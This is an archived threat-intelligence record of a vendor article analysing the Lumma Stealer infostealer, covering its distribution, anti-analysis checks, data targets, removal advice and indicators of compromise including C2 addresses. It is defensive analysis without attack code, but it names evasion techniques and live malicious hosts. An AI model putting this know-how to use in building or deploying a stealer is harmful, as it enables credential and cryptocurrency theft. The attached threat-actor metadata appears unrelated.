{
	"id": "5b34f1d1-4f79-405d-9ad3-8ab1f9fccb1a",
	"created_at": "2026-04-06T00:11:00.488051Z",
	"updated_at": "2026-04-10T13:12:52.668918Z",
	"deleted_at": null,
	"sha1_hash": "656ed915e17564b90806ea9f3ccb162968ec55f0",
	"title": "Lumma Stealer: Advanced Threat Analysis \u0026 Protection Guide 2026",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1248213,
	"plain_text": "Lumma Stealer: Advanced Threat Analysis \u0026 Protection Guide\r\n2026\r\nBy Gridinsoft LLC\r\nArchived: 2026-04-05 14:04:29 UTC\r\nYou download what looks like an innocent software crack or click a link from someone on Discord. Hours later,\r\nyour cryptocurrency wallets are emptied, banking credentials stolen, and accounts compromised. This isn't\r\nrandom bad luck—you've encountered Lumma Stealer, an increasingly sophisticated information-stealing\r\nmalware that's rapidly becoming one of the most dangerous threats to personal and financial data.\r\nWhat is Lumma Stealer?\r\nLumma Stealer (also known as LummaC2) is a sophisticated information-stealing malware that emerged in late\r\n2022, with widespread distribution beginning in early 2023. Written in C++, it's specifically designed to harvest\r\nsensitive data from infected systems, with a particular focus on cryptocurrency wallets, browser credentials, and\r\ntwo-factor authentication (2FA) extensions.\r\nDeveloped by a threat actor known as \"Shamel\" (operating under the alias \"Lumma\"), this malware is distributed\r\nthrough a Malware-as-a-Service (MaaS) model on Russian-speaking cybercriminal forums. What sets Lumma\r\napart from other stealers is its exceptional evasion capabilities, rapid development cycle, and focus on\r\ncryptocurrency theft.\r\nLumma Stealer Key Features\r\nAdvanced anti-analysis techniques to evade security software\r\nComprehensive browser data theft (passwords, cookies, form data)\r\nCryptocurrency wallet targeting (40+ wallets supported)\r\nTwo-factor authentication (2FA) extension theft\r\nMultiple infection vectors including cracked software, Discord, and email\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 1 of 13\n\nSophisticated command and control infrastructure\r\nRegular updates and feature additions\r\nInformation stealers like Lumma represent one of the fastest-growing threats to personal and enterprise data\r\nsecurity, with a 135% increase in detections throughout 2023.\r\nLumma Stealer: Evolution and Impact\r\nWithin months of its initial appearance, Lumma Stealer achieved remarkable success in the cybercriminal\r\necosystem. By mid-2023, darknet forums were offering Lumma logs (stolen data packages) at volumes\r\ncomparable to established players like Vidar and Raccoon Stealer.\r\nInfostealer Market Share Evolution (2022-2024)\r\nQ4 2022 Q2 2023 Q4 2023 Q2 2024\r\n0%\r\n10%\r\n20%\r\n30%\r\n40%\r\n50%\r\nRedLine\r\nRaccoon\r\nVidar\r\nLumma\r\nSource: Analysis of darknet forum offerings and security reports from 2022-2024\r\nLumma's rise coincides with an increase in cryptocurrency-related theft. According to the CISA cybersecurity\r\nadvisory, information stealers like Lumma have contributed to over $5.2 billion in cryptocurrency theft since\r\n2022.\r\nCommercial Offering and Pricing Structure\r\nLumma Stealer operates on a subscription-based model with different pricing tiers:\r\nBasic Package: $250/month\r\nPremium Package: $500/month\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 2 of 13\n\nEnterprise Package: $1000/month\r\nLifetime Access: $5000 (one-time)\r\nThe higher-tier packages include additional features such as persistent cookie stealing (allowing access to\r\naccounts even after password changes), AI-assisted log filtering, custom builds with enhanced evasion, and\r\ndedicated customer support.\r\nSubscription plans advertised on a Darknet forum\r\nLumma Stealer Infection Vectors\r\nLumma Stealer employs multiple distribution methods to maximize its reach. Each approach is carefully tailored\r\nto appear legitimate and bypass user suspicion.\r\n1. Cracked Software and Pirated Applications\r\nThe most common vector for Lumma Stealer infections is through cracked software distribution. This method is\r\nparticularly effective because:\r\nUsers downloading pirated software often intentionally disable security tools\r\nCracked software is expected to trigger some security warnings, making users more likely to ignore them\r\nThe installation process provides cover for malware execution\r\nThreat actors employ SEO poisoning to promote malicious websites offering free versions of popular software.\r\nWhen users download and execute these pirated applications, a staged loader downloads and executes the Lumma\r\nStealer payload.\r\nHacked YouTube Channels Campaign (January 2024)\r\nIn January 2024, security researchers identified a sophisticated campaign where threat actors compromised\r\nYouTube accounts with substantial followings. These hacked channels posted videos promoting free software,\r\nwith download links leading to Lumma Stealer installers.\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 3 of 13\n\nCompromised YouTube channel promoting malicious download\r\n2. Discord Social Engineering\r\nDiscord has become a prime target for Lumma Stealer distribution due to its popularity among gamers and\r\ncryptocurrency enthusiasts. The attack typically follows this pattern:\r\n1. Attackers join popular Discord servers or send unsolicited direct messages\r\n2. They build rapport or immediately send messages with malicious links/files\r\n3. Messages often disguise payloads as game mods, cheat tools, or free software\r\n4. When executed, the payload connects to the command server to download Lumma Stealer\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 4 of 13\n\nDiscord message promoting malware disguised as a game that needs testing\r\n3. Phishing Emails and Malicious Attachments\r\nWhile less common than the previous methods, phishing emails remain an effective distribution vector for Lumma\r\nStealer. These typically take the form of:\r\nFake invoice or shipping notification emails with malicious attachments\r\nSpear-phishing campaigns targeting specific individuals or organizations\r\nFake job offers with \"application forms\" containing embedded malware\r\n4. Fake CAPTCHA Pages\r\nA more recent infection method involves redirecting users to fake CAPTCHA verification pages. According to\r\nTrojan Killer security analysis, these pages claim to verify that the visitor is human but actually trigger the\r\ndownload of malicious JavaScript that ultimately deploys Lumma Stealer.\r\nLumma Stealer Technical Analysis\r\nLumma Stealer employs a sophisticated multi-stage infection process designed to evade detection and analysis.\r\nInfection Chain Overview\r\nTypical Lumma Stealer Attack Sequence\r\n1. Initial Access: User downloads crack/malicious file or clicks on compromised link\r\n2. Stage 1 Loader: Typically a PowerShell or JavaScript downloader with basic obfuscation\r\n3. Environment Checks: Verifies the system is not a virtual machine or analysis environment\r\n4. Payload Download: Retrieves the encrypted Lumma DLL from the C2 server\r\n5. Process Injection: Injects malicious code into legitimate Windows processes\r\n6. Data Collection: Harvests credentials, cookies, crypto wallets, and system information\r\n7. Data Exfiltration: Encrypts and sends stolen data to the C2 server\r\n8. Self-Cleanup: Removes evidence of infection (optional feature)\r\nThe initial infection typically begins with a staged loader—a small script that performs preliminary system checks\r\nbefore downloading the main Lumma Stealer payload. This approach provides multiple advantages:\r\nSmaller initial file size, which is less likely to trigger security alerts\r\nAbility to customize the payload based on the victim's system configuration\r\nOption to abort the infection if security tools or analysis environments are detected\r\nWhat makes Lumma especially interesting is its use of GitHub profiles as intermediary command and control\r\nservers. This technique allows the malware to disguise its traffic as legitimate GitHub API requests, making\r\ndetection more difficult.\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 5 of 13\n\nDetection Evasion Techniques\r\nLumma Stealer employs an extensive array of anti-analysis techniques to evade detection by security solutions\r\nand researchers. These evasion methods have significantly contributed to its rapid rise in popularity among\r\ncybercriminals.\r\nAnti-VM and Anti-Sandbox Techniques\r\nUpon execution, Lumma conducts thorough system checks to determine if it's running in a virtualized\r\nenvironment or analysis sandbox. The malware calls the Windows function GetForegroundWindow to check for\r\ndebugging tools by comparing window titles against known debuggers:\r\nIDA Pro\r\nHyperDbg\r\nx32dbg / x64dbg\r\nAny window with \"debug\" in the title\r\nCheat Engine\r\nWinDbg\r\nOllyDbg\r\nImmunity Debugger\r\ndnSpy\r\nLumma also checks for sandbox environments by scanning for DLLs associated with security tools such as:\r\n360 Total Security\r\nSandboxie\r\nCuckoo Sandbox\r\nComodo Containment\r\nTo evade Wine-based analysis (used in some Linux analysis environments), Lumma searches for the\r\nwine_get_unix_file_name API in kernel32.dll or ntdll.dll.\r\nUsername and System Property Analysis\r\nContinuing its anti-analysis efforts, Lumma examines usernames for common sandbox indicators:\r\nCurrentUser\r\nVirus\r\nSandbox\r\ntest user\r\nmalware\r\nmaltest\r\nWDAGUtilityAccount\r\nJohn Doe\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 6 of 13\n\nThe malware also examines system properties for virtualization indicators:\r\nChecks .sys files in system32 for virtualization drivers\r\nScans device identifiers for generic VM vendor names\r\nInspects running services for VM-related processes\r\nAnalyzes hardware information for virtualization artifacts\r\nIf any of these checks indicate an analysis environment, Lumma terminates execution to prevent researchers from\r\nstudying its behavior.\r\nCode Obfuscation and Encryption\r\nLumma employs sophisticated obfuscation techniques to hide its malicious code:\r\nString Encryption: All hardcoded strings are encrypted to avoid static analysis\r\nControl Flow Obfuscation: Code flow is deliberately complicated with junk instructions\r\nPayload Concealment: Encrypted payload is stored in PNG resource files\r\nAPI Call Hiding: Windows API calls are resolved dynamically at runtime\r\nThese techniques make static analysis and signature-based detection extremely difficult.\r\nData Theft Capabilities\r\nAfter bypassing security measures, Lumma Stealer focuses on its primary objective: harvesting valuable data from\r\nthe infected system.\r\nCommunication with Command \u0026 Control\r\nBefore beginning data collection, Lumma establishes communication with its command and control (C2) server.\r\nEach sample contains encrypted addresses for the primary C2 server and multiple backup servers. The malware\r\ntests each server in sequence until it finds a responsive one.\r\nCommunication with the C2 server uses encrypted HTTP POST requests. This approach allows the malware to\r\nblend in with legitimate web traffic, making network-based detection more difficult.\r\nData Collection Targets\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 7 of 13\n\nExample of data collected by Lumma Stealer\r\nLumma Stealer targets an extensive range of data sources:\r\nBrowser Data\r\nCredentials: Usernames and passwords from all major browsers\r\nCookies: Browser cookies, including persistent authentication cookies\r\nAutofill Data: Saved addresses, credit cards, and form data\r\nBrowsing History: Complete browsing history logs\r\nCryptocurrency Data\r\nWallet Extensions: Data from 40+ browser-based crypto wallet extensions\r\nWallet Files: Local cryptocurrency wallet files and keys\r\nWallet Applications: Data from desktop cryptocurrency applications\r\nSystem Information\r\nHardware Details: CPU, RAM, GPU specifications\r\nSoftware Inventory: Installed applications and versions\r\nNetwork Configuration: IP address, hostname, MAC address\r\nUser Information: Username, language settings, time zone\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 8 of 13\n\nCode segment specifying browser and crypto wallet targets\r\nThe premium version of Lumma includes capabilities to steal persistent cookies, which maintain user sessions\r\neven after password changes. This feature allows attackers to maintain access to compromised accounts even after\r\nthe victim changes their credentials.\r\nData Exfiltration\r\nAfter collecting data, Lumma compresses and encrypts it before transmission to the C2 server. The encryption\r\nensures that network security solutions cannot easily identify the stolen information as it leaves the network.\r\nAccording to Gridinsoft security research, Lumma Stealer employs a sophisticated C2 panel with AI-assisted\r\nfiltering to organize stolen data and identify the most valuable targets. This filtering helps attackers prioritize high-value victims for further exploitation.\r\nWarning Signs of Lumma Stealer Infection\r\nDetecting a Lumma Stealer infection can be challenging due to its stealthy nature, but several indicators may\r\nsuggest your system has been compromised:\r\nSystem Performance Issues\r\nUnexplained system slowdowns, especially during browsing sessions\r\nIncreased CPU usage when no resource-intensive applications are running\r\nBrowser crashes or unusual behavior when accessing secure websites\r\nAccount Security Anomalies\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 9 of 13\n\nUnexpected account logouts or password reset notifications\r\nUnauthorized transactions in financial accounts or cryptocurrency wallets\r\nLogin notification emails from services you didn't access\r\nTwo-factor authentication prompts you didn't initiate\r\nSuspicious Network Activity\r\nUnusual outbound connections to unfamiliar IP addresses\r\nIncreased network activity when the system should be idle\r\nBrowser extensions you don't remember installing\r\nIf you notice any of these warning signs, it's crucial to take immediate action to verify and address a potential\r\ninfection.\r\nHow to Remove Lumma Stealer\r\nIf you suspect your system has been infected with Lumma Stealer, follow these steps to remove the malware and\r\nsecure your accounts:\r\nWindows Removal Steps\r\n1. Disconnect from the internet to prevent further data exfiltration\r\n2. Boot into Safe Mode with Networking (restart while holding Shift, then Troubleshoot → Advanced options\r\n→ Startup Settings → Restart → press F5)\r\n3. Run a full system scan with an updated anti-malware solution\r\n4. Remove any identified threats following your security software's recommendations\r\n5. Check Task Manager for unusual processes and remove any suspicious startup items\r\n6. Reset all browsers or reinstall them completely\r\nFor more comprehensive removal, consider using specialized anti-malware tools:\r\nGridinSoft Anti-Malware - Our specialized tool with infostealer detection capabilities\r\nMicrosoft Defender - Built-in Windows security with regular updates for new threats\r\nPost-Infection Security Measures\r\nAfter removing Lumma Stealer, take these critical steps to secure your accounts and prevent further damage:\r\n1. Change all passwords from a clean device (not the previously infected one)\r\n2. Enable two-factor authentication on all accounts that support it\r\n3. Monitor financial accounts for unauthorized transactions\r\n4. Revoke and reissue API keys for developer accounts\r\n5. Create new cryptocurrency wallets and transfer funds from potentially compromised wallets\r\n6. Check browser extensions and remove any you don't recognize\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 10 of 13\n\nHow to Protect Against Lumma Stealer\r\nPreventing a Lumma Stealer infection is far easier than dealing with its aftermath. Implement these security\r\npractices to protect your system:\r\nSoftware and System Security\r\nAvoid pirated software and cracks - The most common Lumma infection vector\r\nKeep your operating system and applications updated with the latest security patches\r\nUse a reputable security solution with real-time protection\r\nEnable Windows Defender SmartScreen to block malicious downloads\r\nImplement application control policies in enterprise environments\r\nSafe Browsing Practices\r\nBe skeptical of unsolicited messages on Discord, social media, or email\r\nVerify software downloads by using official websites only\r\nCheck URLs carefully before entering credentials or downloading files\r\nAvoid clicking on suspicious links, especially those promising free software\r\nBe wary of fake CAPTCHA pages that prompt you to run code or download files\r\nCryptocurrency Security\r\nUse hardware wallets for storing significant cryptocurrency assets\r\nImplement separate browsing environments for financial activities\r\nConsider a dedicated device for cryptocurrency transactions\r\nRegularly audit installed browser extensions\r\nFor enterprise environments, consider implementing these additional protections as recommended by Microsoft\r\nSecurity:\r\nRestrict PowerShell and script execution using AppLocker or Windows Defender Application Control\r\nDeploy network monitoring solutions to detect suspicious outbound connections\r\nImplement least privilege access controls to limit the impact of compromised accounts\r\nConduct regular security awareness training focusing on current social engineering tactics\r\nLumma Stealer Indicators of Compromise (IoC)\r\nSecurity professionals can use these indicators to identify potential Lumma Stealer infections in their\r\nenvironment:\r\nOperation MITRE ATT\u0026CK Techniques\r\nInformation collection\r\nT1217: Browser Information Discovery T1083: File and\r\nDirectory Discovery\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 11 of 13\n\nOperation MITRE ATT\u0026CK Techniques\r\nExecuted the encrypted payload using\r\npowershell.exe\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1027.013: Obfuscated Files or\r\nInformation: Encrypted/Encoded File\r\nPowerShell downloaded Lumma Stealer and\r\nexecuted\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nExecuted the initial PS code\r\nT1204: User Execution\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nDownload the payload using mshta, which\r\nhad overlayed script\r\nT1218.005: System Binary Proxy Execution: Mshta\r\nT1027.009: Obfuscated Files or Information: Embedded\r\nPayloads\r\nLumma Injected malicious payload in\r\nBitLockerToGo\r\nT1055.012: Process Injection: Process Hollowing\r\nInjected process executed killing.bat script\r\nT1059.003: Command and Scripting Interpreter: Windows\r\nCommand Shell\r\nBatch script discover the process and start\r\nautoit\r\nT1057: Process Discovery\r\nAutoit executes the script T1059.010: Command and Scripting Interpreter: AutoIT\r\nFake captcha verification T1566: Phishing\r\nExfiltration T1041: Exfiltration Over C2 Channel\r\nCommonly Used C2 Domains and IP Addresses\r\nSecurity teams should monitor for connections to these known Lumma Stealer command and control servers:\r\n176.113.115.224\r\n176.113.115.226\r\n176.113.115.227\r\n176.113.115.229\r\n176.113.115.232\r\n144.76.173.247\r\n45.9.74.78\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 12 of 13\n\n77.73.134.68\r\n82.117.255.127\r\n82.117.255.80\r\n82.118.23.50\r\nSuspicious Domains\r\nThese domains have been associated with Lumma Stealer distribution campaigns:\r\nfutureddospzmvq[.]shop\r\nwriterospzm[.]shop\r\nmennyudosirso[.]shop\r\ndeallerospfosu[.]shop\r\nquialitsuzoxm[.]shop\r\ncomplaintsipzzx[.]shop\r\nbassizcellskz[.]shop\r\nlanguagedscie[.]shop\r\ncelebratioopz[.]shop\r\nRelated Resources\r\nFor more detailed information about Lumma Stealer and similar threats, refer to these resources:\r\nFake CAPTCHA Sites Trick Users to Run Lumma Stealer\r\nLumma Stealer Spreads Via Fake Browser Updates\r\nHow to Detect, Remove, and Prevent Infostealer Infections\r\nComprehensive Malware Removal Guide\r\nSpyware Removal and Protection\r\nSource: https://gridinsoft.com/spyware/lumma-stealer\r\nhttps://gridinsoft.com/spyware/lumma-stealer\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://gridinsoft.com/spyware/lumma-stealer"
	],
	"report_names": [
		"lumma-stealer"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434260,
	"ts_updated_at": 1775826772,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/656ed915e17564b90806ea9f3ccb162968ec55f0.pdf",
		"text": "https://archive.orkl.eu/656ed915e17564b90806ea9f3ccb162968ec55f0.txt",
		"img": "https://archive.orkl.eu/656ed915e17564b90806ea9f3ccb162968ec55f0.jpg"
	}
}